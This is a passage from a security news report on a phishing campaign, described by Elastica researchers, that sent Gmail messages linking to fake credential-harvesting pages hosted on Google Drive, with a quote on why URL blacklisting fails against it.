In this case, the attackers used Gmail to distribute emails containing links to unauthorized Web pages hosted on Google Drive, and then stored stolen credentials through a third-party domain.
Though researchers are uncertain whether the Gmail account was compromised or if attackers created a false account, the phishing emails were delivered successfully and undetected by Google’s built-in spam engine.
Here’s a complete workflow of the phishing campaign, click on the image to enlarge:
When Elastica reported it to Google two weeks prior to this announcement, all the components in this phishing attack were working. Though the phishing Web pages have been reported to Google, they are currently still active and have not yet been removed.
“In this particular incident, attackers were able to circumvent tight security controls and target Google users specifically to gain access to a multitude of services associated with Google accounts,” said Dr. Aditya K Sood, architect of Elastica Cloud Threat Labs.
Because the phishing Web pages are hosted on Google Drive, standard blacklisting using IP addresses and URLs is ineffective. Traditional intrusion detection and prevention systems cannot provide defense in these types of scenarios either. Credentials stolen in these attacks can be used by attackers themselves or sold on the digital black market to buyers who then use them for malicious purposes.
Here’s a video of the phishing in action: